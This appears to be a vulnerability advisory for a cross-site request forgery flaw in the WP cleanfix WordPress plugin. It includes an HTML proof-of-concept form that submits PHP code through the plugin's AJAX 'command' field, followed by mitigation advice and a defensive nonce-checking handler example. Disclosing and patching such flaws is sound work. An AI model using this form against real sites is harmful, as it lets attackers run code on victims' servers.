Vendor: WP cleanfix
By: SecurityFocus
CVSS: 3.1 (MEDIUM)
CWE: CWE-352 (Cross-Site Request Forgery)
Product Name: WP cleanfix
Affected Version From: 2.4.4
Affected Version To: 2.4.4
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wp_cleanfix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013
WP cleanfix Cross-Site Request Forgery Vulnerability
The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

CSRF PoC (generated by Burp Suite Professional):

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
          <input type="hidden" name="action" value="wpCleanFixAjax" />
          <input type="hidden" name="command" value="echo phpversion();" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
Mitigation:
Users should only use trusted sources for plugins and themes, and should always verify the authenticity of the code before installing it. Additionally, users should keep all installed plugins and themes up to date.
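For plugin developers, the fix on the server side is the pattern below: an admin-ajax.php handler that rejects requests without a per-user nonce, checks the caller's capability, and dispatches on an allow-list rather than running a client-supplied string. This is an added illustration, not WP cleanfix's own code; only the action name wpCleanFixAjax comes from the PoC above, and the function names, nonce action, and command list are assumptions.

```php
<?php
// Added example, not the plugin's code. Only the AJAX action name
// 'wpCleanFixAjax' is taken from the PoC; every other name is assumed.

// Register for logged-in users only (wp_ajax_ prefix). There is deliberately
// no wp_ajax_nopriv_ hook, so anonymous requests are answered with "0".
add_action( 'wp_ajax_wpCleanFixAjax', 'wpcf_example_ajax_handler' );

function wpcf_example_ajax_handler() {
    // 1. CSRF check: the POST must carry a nonce bound to this action and to
    //    the current user's session. A form on another origin cannot read it,
    //    so a forged request like the PoC above dies here with "-1".
    check_ajax_referer( 'wpcf_example_nonce', 'nonce' );

    // 2. Authorisation: a valid nonce only proves intent, not privilege.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Dispatch on a fixed allow-list instead of executing the raw
    //    'command' parameter the PoC sends.
    $command = isset( $_POST['command'] ) ? sanitize_key( $_POST['command'] ) : '';
    switch ( $command ) {
        case 'php_version':
            $result = phpversion();
            break;
        case 'wp_version':
            $result = get_bloginfo( 'version' );
            break;
        default:
            wp_send_json_error( array( 'message' => 'unknown command' ), 400 );
    }
    wp_send_json_success( array( 'result' => $result ) );
}

// The plugin's own admin page hands the nonce to its JavaScript as a hidden
// field; legitimate same-origin requests include it, cross-site forms cannot.
function wpcf_example_print_nonce() {
    wp_nonce_field( 'wpcf_example_nonce', 'nonce' );
}
add_action( 'admin_footer', 'wpcf_example_print_nonce' );
```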